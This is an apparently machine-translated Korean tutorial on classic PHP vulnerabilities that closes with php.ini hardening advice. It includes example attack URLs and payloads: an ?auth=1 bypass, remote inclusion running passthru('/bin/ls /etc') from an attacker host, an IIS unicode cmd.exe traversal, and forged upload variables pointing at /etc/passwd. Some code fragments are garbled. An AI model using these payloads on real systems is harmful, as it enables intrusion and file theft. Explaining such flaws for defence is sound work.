PHP 프로그램의 일반적인 취약점을 공격하는 방법

[전역 변수]
PHP의 변수는 미리 선언할 필요가 없으며 처음 사용할 때 자동으로 생성되며 유형을 지정할 필요가 없습니다. 맥락. 프로그래머의 관점에서 볼 때 이는 의심할 여지없이 매우 편리한 방법입니다. 분명히 이것은 빠른 개발 언어의 매우 유용한 기능이기도 합니다. 변수가 생성되면 프로그램의 어느 곳에서나 사용할 수 있습니다. 이 기능의 결과는 프로그래머가 변수를 거의 초기화하지 않는다는 것입니다. 결국 변수는 처음 생성될 때 비어 있습니다.

분명히 PHP 기반 애플리케이션의 주요 기능은 일반적으로 사용자 입력(주로 양식 변수, 업로드된 파일, 쿠키 등)을 받아들인 다음 입력 데이터를 처리한 다음 결과를 클라이언트에 반환합니다. 브라우저. PHP 코드가 사용자 입력에 최대한 쉽게 접근할 수 있도록 하기 위해 PHP는 실제로 이 입력 데이터를 전역 변수로 처리합니다.

예:

분명히 텍스트 상자와 제출 버튼이 표시됩니다. 사용자가 제출 버튼을 클릭하면 "test.php"가 사용자 입력을 처리합니다. "test.php"가 실행되면 "$hello"에는 사용자가 텍스트 상자에 입력한 데이터가 포함됩니다. 여기서 우리는 공격자가 자신의 희망에 따라 전역 변수를 생성할 수 있음을 확인해야 합니다. 공격자가 폼 입력을 통해 "test.php"를 호출하지 않고 브라우저 주소창에 직접 http://server/test.php?hello=hi&setup=no를 입력하면 "$hello"만 생성되는 것이 아니라, "$setup"도 생성됩니다.

번역자 주: 이 두 가지 방법은 우리가 일반적으로 "POST" 및 "GET" 방법이라고 부르는 것입니다.
다음 사용자 인증 코드는 PHP의 전역 변수로 인해 발생하는 보안 문제를 노출합니다.

if ($pass == "hello")
$auth = 1
...
if ($auth == 1)
echo "some important information";
?>

위 코드는 먼저 사용자의 비밀번호가 "hello"인지 확인합니다. , 일치하는 경우 "$auth"를 "1"로 설정합니다. 즉, 인증이 통과됩니다. 이후에 "$suth"가 "1"이면 몇 가지 중요한 정보가 표시됩니다.

표면적으로는 정확해 보이고 우리 중 상당수가 그렇게 하지만 이 코드는 값이 설정되지 않은 경우 "$auth"가 비어 있다고 가정하는 실수를 범합니다. 공격자는 "http://server/test.php?auth=1"과 같은 방법을 사용하여 전역 변수를 생성하고 값을 할당할 수 있으며, 이 코드를 완전히 속여 인증된 것처럼 만들 수 있습니다.

따라서 PHP 프로그램의 보안을 강화하기 위해 명확하게 정의되지 않은 변수는 신뢰할 수 없습니다. 프로그램에 변수가 많으면 이는 매우 어려운 작업이 될 수 있습니다.

일반적인 보호 방법은 제출 방법(GET 또는 POST)에 따라 HTTP_GET[] 또는 POST_VARS[] 배열의 변수를 확인하는 것입니다. "track_vars" 옵션이 켜져 있는 상태(기본값)로 PHP를 구성하면 사용자가 제출한 변수를 전역 변수와 위에서 언급한 배열에서 사용할 수 있습니다.

하지만 PHP에는 사용자 입력을 처리하는 데 사용되는 네 가지 배열 변수가 있다는 점을 언급할 가치가 있습니다. HTTP_GET_VARS 배열은 GET 모드로 제출된 변수를 처리하는 데 사용되고, HTTP_POST_VARS 배열은 POST 모드로 제출된 변수를 처리하는 데 사용되며, HTTP_COOKIE_VARS 배열은 쿠키 헤더로 제출된 변수를 처리하는 데 사용되며, HTTP_POST_FILES 배열(비교적 새로운 PHP에서 제공) ) 이는 완전히 사용자가 변수를 제출하는 선택적인 방법입니다. 사용자 요청은 이 네 가지 배열에 변수를 쉽게 저장할 수 있으므로 보안 PHP 프로그램은 이 네 가지 배열을 확인해야 합니다.

[원격 파일]
PHP는 풍부한 기능을 갖춘 언어이며 많은 기능을 제공하므로 프로그래머가 특정 기능을 쉽게 구현할 수 있습니다. 그러나 보안 관점에서 보면 기능이 많을수록 보안을 보장하기가 더 어려워집니다. 원격 파일이 이 문제의 좋은 예입니다.

if ( !($fd = fopen("$filename", "r"))
echo("파일을 열 수 없습니다: $filename
")
?>

위 스크립트가 열려고 합니다. "$filename" 파일을 검색하고 실패하면 오류 메시지를 표시합니다. 분명히 "$filename"을 지정할 수 있으면 이 스크립트를 사용하여 시스템의 모든 파일을 탐색할 수 있습니다. 확실한 특징은 다른 웹 또는 FTP 사이트에서 파일을 읽을 수 있다는 것입니다. 실제로 대부분의 PHP 파일 처리 기능은 원격 파일에 투명합니다.

예:
"$filename"을 다음과 같이 지정합니다. "http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir"
위 코드는 실제로 컴퓨터의 호스트 대상 유니코드 취약점을 이용하여 다음을 실행합니다. dir 명령
.
이렇게 하면 원격 파일에 대한 include(), require(), include_once() 및 require_once() 지원이 상황에 따라 더 흥미로워집니다. 이 함수의 주요 기능은 지정된 파일의 내용을 포함하고 이를 PHP 코드에 따라 해석하는 것입니다. 주로 라이브러리 파일에 사용됩니다.

예:
include($libdir . "/언어s.php")
?> 위의 예 일반적으로 코드를 실행하기 전에 설정한 경로인데, 공격자가 "$libdir"을 설정하지 않을 경우 이 경로를 변경할 수 있다. 그러나 공격자는 자신이 지정한 경로에 있는 Languages.php 파일에만 액세스할 수 있기 때문에 아무것도 할 수 없습니다(Perl의 "Poison null byte" 공격은 PHP에 영향을 미치지 않습니다). 그러나 원격 파일을 지원하면 공격자는 무엇이든 할 수 있습니다. 예를 들어 공격자는 다음 내용이 포함된 언어.php 파일을 서버에 배치할 수 있습니다.

passthru("/bin/ls /etc")? >

그런 다음 "$libdir"을 "http:///"로 설정하면 대상 호스트에서 위의 공격 코드를 실행할 수 있고 "/etc"의 내용은 결과는 고객의 브라우저로 반환됩니다.

공격 서버(즉, evilhost)는 PHP 코드를 실행할 수 없어야 한다는 점에 유의해야 합니다. 그렇지 않으면 공격 코드가 대상 서버가 아닌 공격 서버에서 실행됩니다. 구체적인 기술 세부 사항은 다음을 참조하세요: http://www.securereality.com.au/sradv00006.txt

[파일 업로드]
PHP는 RFC 1867 기반의 파일 업로드를 자동으로 지원합니다. 다음 예:

;INPUT TYPE="HIDDEN" NAME= "MAX_FILE_SIZE" VALUE="10240">

위 코드는 다음을 허용합니다. 사용자가 로컬 컴퓨터에서 파일을 선택하면 제출을 클릭하면 파일이 서버에 업로드됩니다. 이는 분명히 유용한 기능이지만 PHP가 응답하는 방식으로 인해 안전하지 않습니다. PHP가 이러한 요청을 처음 받으면 호출된 PHP 코드를 구문 분석하기 전에 먼저 원격 사용자로부터 파일을 수락하고 파일 길이가 "$MAX_FILE_SIZE 변수"에 정의된 값을 초과하는지 확인합니다. 테스트를 위해 파일은 로컬 임시 디렉터리에 저장됩니다.

따라서 공격자는 PHP를 실행하는 호스트에 임의의 파일을 보낼 수 있습니다. PHP 프로그램이 파일 업로드를 수락할지 여부를 결정하기 전에 해당 파일은 이미 서버에 저장되어 있습니다.

여기서는 서버에 대한 DOS 공격을 수행하기 위해 파일 업로드를 사용할 가능성에 대해 논의하지 않습니다.

위에서 말했듯이 파일이 수신되어 서버에 저장되며(위치는 일반적으로 /tmp 구성 파일에 지정됨) 확장자를 처리하는 PHP 프로그램을 생각해 보겠습니다. 무작위, "phpxXuoXG" 형식과 유사합니다. PHP 프로그램은 파일을 처리하기 위해 파일 정보를 업로드해야 하는데, 이는 PHP 3에서 이미 사용했던 방법과 이전 방법에 대한 보안 권고를 작성한 후 도입된 두 가지 방법으로 수행할 수 있습니다.

그러나 문제는 여전히 존재하며 대부분의 PHP 프로그램은 업로드된 파일을 처리하기 위해 여전히 이전 방식을 사용하고 있다고 확신할 수 있습니다. PHP는 위의 예와 같이 업로드된 파일을 설명하기 위해 4개의 전역 변수를 설정합니다.

$hello = 로컬 컴퓨터의 파일 이름(예: "/tmp/phpxXuoXG")
$hello_size = 파일의 바이트 크기( 예: 1024)
$hello_name = 원격 시스템에 있는 파일의 원래 이름(예: "c: emphello.txt")
$hello_type = 업로드된 파일의 MIME 유형(예: "text/plain")

그런 다음 PHP 프로그램은 "$hello"에 따라 지정된 파일을 처리하기 시작합니다. 문제는 "$hello"가 반드시 PHP에서 설정한 변수가 아니며 모든 원격 사용자가 이를 지정할 수 있다는 것입니다. 다음 방법을 사용하면:

http://vulnhost/vuln.php?hello=/etc/passwd&hello_size=10240&hello_type=text/plain&hello_name=hello.txt

결과는 다음 PHP가 됩니다. 전역 변수(물론 POST 방법도 가능합니다(쿠키도 가능)):

$hello = "/etc/passwd"
$hello_size = 10240
$hello_type = "text/plain"
$hello_name = "hello.txt"

위의 양식 데이터는 PHP 프로그램에서 기대하는 변수를 딱 충족하지만, 이때 PHP 프로그램은 더 이상 업로드된 파일을 처리하지 않고 "/etc/"만 처리합니다. passwd ” (종종 콘텐츠 노출로 이어짐). 이 공격은 민감한 파일의 내용을 노출하는 데 사용될 수 있습니다.

앞서 말했듯이 새 버전의 PHP에서는 업로드된 파일을 확인하기 위해 HTTP_POST_FILES[]를 사용하며, 이 문제를 해결하기 위한 많은 기능도 제공합니다. 예를 들어 특정 파일이 실제로 업로드된 파일인지 확인하는 데 사용되는 기능이 있습니다. 이러한 함수는 이 문제를 매우 잘 해결하지만 실제로는 여전히 이전 방법을 사용하고 이 공격에 취약한 PHP 프로그램이 많이 있을 것입니다.

파일 업로드 공격 방법의 변형으로 다음 코드를 살펴보겠습니다.

if (file_exists($theme)) // 파일이 로컬 시스템에 있는지 확인합니다(원격 파일 없음)
include("$theme")
?>

공격자가 "$theme"을 제어할 수 있는 경우 "$theme"을 이용하여 원격 시스템의 모든 파일을 읽을 수 있습니다. 공격자의 최종 목표는 원격 서버에서 임의의 명령을 실행하는 것이지만 원격 파일을 사용할 수 없으므로 원격 서버에 PHP 파일을 생성해야 합니다. 처음에는 불가능해 보일 수 있지만 파일 업로드를 통해 이 작업을 수행할 수 있습니다. 공격자가 먼저 로컬 컴퓨터에 PHP 코드가 포함된 파일을 만든 다음 "theme"라는 파일 필드가 포함된 양식을 만들고 마지막으로 이 양식을 사용하여 PHP 코드가 포함된 생성된 파일을 파일 업로드를 통해 위 코드에 제출합니다. PHP는 공격자가 제출한 파일을 저장하고 이러한 방식으로 file_exists() 함수를 "$theme" 값으로 설정합니다. 검사를 통과하고 공격자의 코드가 실행됩니다.

임의의 명령을 실행할 수 있는 능력을 얻은 후 공격자는 분명히 권한을 높이거나 결과를 확장하려고 하는데, 이를 위해서는 서버에서 사용할 수 없는 일부 도구 세트가 필요하며 파일 업로드가 다시 한 번 우리에게 도움이 되었습니다. 공격자는 파일 업로드 기능을 사용하여 도구를 업로드하고 서버에 저장한 다음 명령을 실행하는 기능을 사용하고 chmod()를 사용하여 파일의 권한을 변경한 다음 실행할 수 있습니다. 예를 들어 공격자는 방화벽이나 IDS를 우회해 로컬 루트 공격 프로그램을 업로드한 후 실행함으로써 루트 권한을 얻을 수 있다.
처음에 사람들은 PHP 프로그램을 개발하고 출시할 때 기본 프로그램 코드와 코드 베이스를 구별하기 위해 일반적으로 코드 베이스 파일에 ".inc" 확장자를 설정했지만 곧 이것이 발견되었습니다. PHP 인터프리터가 해당 파일을 PHP 코드로 올바르게 구문 분석할 수 없기 때문에 오류가 발생했습니다. 이런 파일을 서버에 직접 요청하면 해당 파일의 소스코드를 얻게 되는데, 이는 PHP를 아파치 모듈로 사용할 때 PHP 인터프리터가 파일 확장자에 따라 이를 PHP로 파싱할지 여부를 결정하기 때문입니다. 암호. 확장자는 사이트 관리자가 지정하며 일반적으로 ".php", ".php3" 및 ".php4"입니다. 중요한 구성 데이터가 적절한 확장명 없이 PHP 파일에 포함되어 있으면 원격 공격자가 이 정보를 쉽게 얻을 수 있습니다.

가장 간단한 해결책은 각 파일에 PHP 파일 확장자를 지정하는 것입니다. 이렇게 하면 소스 코드 유출을 막을 수 있지만, 이 파일을 요청하면 공격자가 실행해야 하는 코드가 발생할 수 있습니다. 독립적으로 실행되는 맥락에서 이는 이전에 논의된 모든 공격으로 이어질 수 있습니다.

다음은 명백한 예입니다.

main.php에서:
$libDir = "/libdir"
$langDir = " $ libdir/언어";

...

include("$libdir/load언어.php":
?>

libdir/load언어.php에서:
...

include("$langDir/$userLang")
?> "main.php"로 호출하면 꽤 안전하지만, "libdir/load언어"는 ".php" 확장자를 가지므로 원격 공격자가 이 파일을 직접 요청할 수 있고 "$langDir" 및 " $userLang" 값을 임의로 지정할 수 있습니다. 🎜>[세션 파일]
PHP 4 이상 버전에서는 세션을 지원합니다. 주요 기능은 PHP 프로그램의 페이지 간 상태 정보를 저장하는 것입니다. 로그인한 사람과 웹사이트에 로그인한 사람이 세션에 저장되며 모든 PHP 코드는 웹사이트를 탐색할 때 이 상태 정보를 얻을 수 있습니다.

실제로 세션이 시작되면(실제로 첫 번째 요청에서 자동으로 시작되도록 구성 파일에 설정됨) 임의의 "세션 ID"가 생성됩니다. 이 "세션 ID"는 요청을 보낼 때 원격 브라우저가 항상 제출하는 경우입니다. 사용하면 세션이 항상 유지됩니다. 이는 쿠키를 통해 또는 각 페이지에 양식 변수("세션 ID" 포함)를 제출하여 쉽게 수행할 수 있습니다. PHP 프로그램은 세션을 사용하여 특수 변수를 등록할 수 있습니다. 해당 값은 각 PHP 스크립트가 끝난 후 세션 파일에 저장되고 각 PHP 스크립트가 시작되기 전에 변수에 로드됩니다. 다음은 간단한 예입니다.

session_destroy(); // 현재 세션에 있는 모든 데이터를 종료합니다.
$session_auth = "shaun"
session_register("session_auth " ); // $session_auth를 세션 변수로 등록
?>

PHP의 새 버전은 자동으로 "$session_auth" 값을 "shaun"으로 설정합니다. 스크립트는 수정된 값을 자동으로 허용합니다. 이것은 실제로 상태 비저장 웹을 위한 매우 좋은 도구이지만 주의해야 합니다.

명백한 문제는 변수가 세션에서 나오는지 확인하는 것입니다. 예를 들어 위 코드가 주어지고 후속 스크립트가 다음과 같은 경우:

if ( !empty($session_auth))
// 여기
?>

위 코드에서는 "$session_auth"가 설정된 경우 세션에서 온 것으로 가정합니다. 세션에서가 아닌 비트는 사용자 입력에 의해 설정됩니다. 공격자가 양식 입력을 통해 비트를 설정하면 해당 사이트에 접근할 수 있습니다. 공격자는 이 공격 방법을 사용하기 전에 세션에 변수를 등록해야 합니다. 변수가 세션에 추가되면 모든 양식 입력을 덮어쓰게 됩니다.

세션 데이터는 일반적으로 파일에 저장됩니다(위치는 구성 가능하며 일반적으로 "/tmp"). 파일 이름은 일반적으로 "sess_" 형식입니다. 변수 유형, 변수 값 및 기타 데이터. 다중 호스트 시스템에서는 파일이 웹 서버를 실행하는 사용자(보통 아무도)로 저장되기 때문에 악의적인 사이트 소유자가 다른 사이트에 접근하기 위해 세션 파일을 생성할 수 있고 심지어 세션 파일의 민감한 정보를 검사할 수도 있습니다. .

또한 세션 메커니즘은 공격자가 자신의 입력을 원격 시스템의 파일에 저장할 수 있는 또 다른 편리한 장소를 제공합니다. 위의 예에서 공격자는 다음과 같은 경우 원격 시스템에 PHP 코드가 포함된 파일을 배치해야 합니다. 파일을 업로드하는 것만으로는 할 수 없으며, 그는 일반적으로 세션을 사용하여 자신이 원하는 대로 변수에 값을 할당한 다음 세션 파일의 위치를 ​​추측하고 파일 이름이 "php ", 그래서 그는 일반적으로 "/tmp"인 디렉토리를 추측해야 합니다.

또한 공격자는 "세션 ID"(예: "hello")를 임의로 지정한 후 이 "세션 ID"를 사용하여 세션 파일(예: "/tmp/sess_hello")을 생성할 수 있습니다. , 단, "세션 ID"는 문자와 숫자의 조합만 가능합니다.

[데이터 유형]
PHP에는 느슨한 데이터 유형이 있으며 변수 유형은 변수가 위치한 컨텍스트에 따라 다릅니다. 예를 들어 "$hello"는 값이 ""인 문자열 변수로 시작하지만 평가할 때 정수 변수 "0"이 되어 때로는 예상치 못한 결과가 발생할 수 있습니다. "$hello"의 값이 "000"과 "0" 사이에서 다른 경우, empty()에 의해 반환된 결과는 true가 아닙니다.

PHP의 배열은 연관 배열입니다. 즉, 배열의 인덱스는 문자열 유형입니다. 이는 "$hello["000"]"와 "$hello[0]"도 다르다는 의미입니다.

프로그램을 개발할 때 위의 문제를 신중하게 고려해야 합니다. 예를 들어 변수가 "0"인지 한 곳에서 테스트하고 다른 곳에서 이를 확인하기 위해 empty()를 사용해서는 안 됩니다.

[오류가 발생하기 쉬운 함수]
PHP 프로그램의 취약점을 분석할 때 소스 코드를 얻을 수 있다면 오류가 발생하기 쉬운 함수 목록이 매우 필요합니다. 이러한 기능의 매개변수를 원격으로 변경할 수 있다면 취약점을 발견할 가능성이 높습니다. 다음은 오류가 발생하기 쉬운 함수의 자세한 목록입니다.


require(): 지정된 파일의 내용을 읽고 이를 PHP 코드로 해석합니다.
include( ) : 위와 동일
eval(): 주어진 문자열을 PHP 코드로 실행
preg_replace(): "/e" 스위치와 함께 사용하면 대체 문자열이 PHP 코드로 해석됩니다


exec(): 지정된 명령을 실행하고 실행 결과의 마지막 줄을 반환합니다
passthru(): 지정된 명령을 실행하고 모든 결과를 클라이언트 브라우저로 반환합니다
`` : 지정된 명령을 실행하고 모든 결과를 배열로 반환
system(): passthru()와 동일하지만 바이너리 데이터를 처리하지 않습니다
popen(): 지정된 명령을 실행하고 입력 또는 출력을 PHP 파일 설명자에 연결

<파일 유출>
fopen(): 파일을 열고 PHP 파일 설명자에 대응합니다
readfile(): 파일의 내용을 읽어 클라이언트 브라우저에 출력합니다.
file(): 전체 파일 내용을 배열로 읽어옵니다.

역자 주: 사실 이 목록은 그리 많지 않습니다. 길게 완료하면 "mail()"과 같은 명령도 명령을 실행할 수 있으므로 직접 추가해야 합니다.
[PHP의 보안을 강화하는 방법]
위에서 소개한 모든 공격은 PHP 4의 기본 설치에서도 잘 구현될 수 있지만 여러 번 반복했는데 PHP의 구성이 매우 유연합니다. 일부 PHP 옵션을 구성하면 이러한 공격 중 일부에 저항할 수 있습니다. 아래에서는 구현 난이도에 따라 몇 가지 구성을 분류했습니다.

*낮음 난이도
**중-낮음 난이도
***중-상난도
****높음 난이도

위 분류는 개인적인 의견일 뿐이지만, PHP에서 제공하는 모든 옵션을 사용하면 제3자 코드라도 PHP가 매우 안전할 것이라고 장담할 수 있습니다. 많은 기능 더 이상 사용할 수 없습니다.

**** "register_globals"를 "off"로 설정
이 옵션은 PHP가 사용자 입력을 위한 전역 변수를 생성하는 것을 비활성화합니다. 즉, 사용자가 "hello" 양식 변수를 제출하면 PHP는 "$hello"를 생성하지 않고 "HTTP_GET/POST_VARS['hello']"만 생성됩니다. 이는 PHP에서 매우 중요한 옵션입니다. 이 옵션을 끄면 프로그래밍에 큰 불편을 초래할 수 있습니다.

*** "safe_mode"를 "on"으로 설정하세요.
이 옵션을 켜면 다음 제한 사항이 추가됩니다.
1. 실행할 수 있는 명령을 제한하세요
2. 사용할 수 있는 기능을 제한하세요
3. 스크립트 소유권 및 대상 파일 소유권에 따른 파일 접근 제한
4. 파일 업로드 비활성화
이는 ISP를 위한 훌륭한 옵션이며 PHP 보안을 크게 향상시킬 수도 있습니다.

** "open_basedir" 설정
이 옵션은 지정된 디렉터리 외부의 파일 작업을 금지하여 로컬 파일이나 원격 파일에 대한 include() 공격을 효과적으로 제거할 수 있지만 여전히 파일 업로드에 주의해야 합니다. 및 세션 파일 공격.

** "display_errors"를 "off"로 설정하고 "log_errors"를 "on"으로 설정합니다.
이 옵션은 오류 메시지가 웹 페이지에 표시되지 않도록 하지만 이를 로그 파일에 기록합니다. 이는 효과적일 수 있습니다. 공격자가 대상 스크립트에서 기능을 탐지하는 것을 방지합니다.

* "allow_url_fopen"을 "off"로 설정하세요.
이 옵션은 원격 파일 기능을 비활성화할 수 있으므로 적극 권장합니다!

더 많은 관련 내용은 PHP 중국어 홈페이지(www.php.cn)를 주목해주세요!